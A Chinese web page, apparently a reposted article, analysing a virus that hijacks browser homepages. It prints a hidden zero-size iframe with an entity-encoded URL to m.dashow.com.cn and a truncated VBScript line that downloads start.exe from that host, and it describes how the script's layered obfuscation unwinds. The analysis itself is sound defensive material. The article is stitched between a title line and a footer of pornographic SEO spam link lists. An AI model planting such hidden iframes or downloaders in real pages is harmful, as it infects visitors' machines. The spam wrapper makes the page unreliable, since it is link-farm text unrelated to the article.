日本粉色视频-日本理论片中文在线观看2828-日本理论在线观看被窝网-日本黄大片在线观看-国产精品福利在线观看秒播-国产精品福利资源在线

面對網站惡意病毒我們該怎么辦?

  前不久,很多網友都感染了網站的病毒,首頁被改成這個網站,并且無法改回。黑客是如何做到鎖定用戶的瀏覽器首頁呢?下面我們就去探個究竟。

  提醒:分析病毒存在一定風險,建議在虛擬機下操作。

  第一步 查看病毒網站首頁的源代碼,可以發現在尾部有如下的字樣:

  <iframe src=&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108 width=0 height=0></iframe>

  這是一個嵌入到7b網址之家首頁的頁面,即打開網站也就同時打開了這個頁面。

  而“&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108”表示的是一個字符串,“&#”后面是每個字符串ASCII的十進制值。

  直接把這段亂碼保存為HTM文件,用IE打開,就可以看到它的真實面目“http : // m.dashow.com.cn / m.html”。

  第二步 查看http : // m.dashow.com.cn / m.html的源代碼,把看的<scrtipt>腳本段中的Execute替換為Document.Write,然后打開這個HTM頁面,就會出現一段代碼,同樣地,把EXECUTE換成我們無敵的Document.Write,前后加腳本標記,存HTM打開。屏幕上立即出現了一段令人眼花的東西。把眼花繚亂的東西整理一下,并將出現的CHR()在前面用到過,作用是把字符的ASCII轉成字符,只不過這次是16進制。然后再將字符拼接成字符串,然后再Execute運行這個命令字符串。繼續用Document.Write替換掉EXECUTE,前后加腳本標記,存HTM打開。

  第三步 經過上幾步的還原后終于看到了這個惡意頁面的最終面目。

  on error resume next curl = "http : // m.dashow.com.cn / start.exe"……其后省略。

  這段代碼中我們可以很清楚地看到http : // m.dashow.com.cn / start.exe這個鏈接。沒錯,它就是運行后可以將用戶主頁鎖定為網站的病毒。

  可以用下載工具將這個文件下載下來,如果你的殺毒軟件查不到的話最好立即上報。這樣可以保證殺毒軟件快速查殺這個病毒,并使更少的網友免受該病毒的侵害。

北大青鳥網上報名
北大青鳥招生簡章
主站蜘蛛池模板: 99精品视频在线播放2 | 国产亚洲一区二区手机在线观看 | 久久香蕉国产线看观看精品yw | 日日操干| 国产精品免费看久久久香蕉 | 久久精品视频日本 | 亚洲黄色免费在线观看 | 国产在线高清视频 | 欧美性色黄大片一级毛片视频 | 午夜爱爱毛片xxxx视频免费看 | 国内黄色一级精品 | 国产精品久久久久久免费播放 | 国产成人亚洲精品久久 | 香蕉视频国产精品 | 日韩一级片在线免费观看 | 手机亚洲第1页 | 18在线观看国内精品视频 | 亚洲黄色在线播放 | 香港全黄一级毛片在线播放 | 国产精品福利社 | 欧美性色黄在线视 | 一区二区三区在线观看视频 | 中文字幕日韩一区二区不卡 | 久久久久久极精品久久久 | 99aiav国产精品视频 | 韩日一区二区 | 欧美成人精品免费播放 | 欧美国产高清欧美 | 国产日本欧美在线观看 | 国产在线观看网址在线视频 | 亚洲精品一区二区三区在线看 | 国产成人三级经典中文 | 国产一区二区在线不卡 | 欧美精品做人一级爱免费 | 在线观看免费视频网站色 | 国产日本欧美亚洲精品视 | 国产成人精品一区二区视频 | 欧美一级黄色毛片 | 久久免费国产精品一区二区 | 在线亚洲黄色 | 亚洲国产精品a在线 |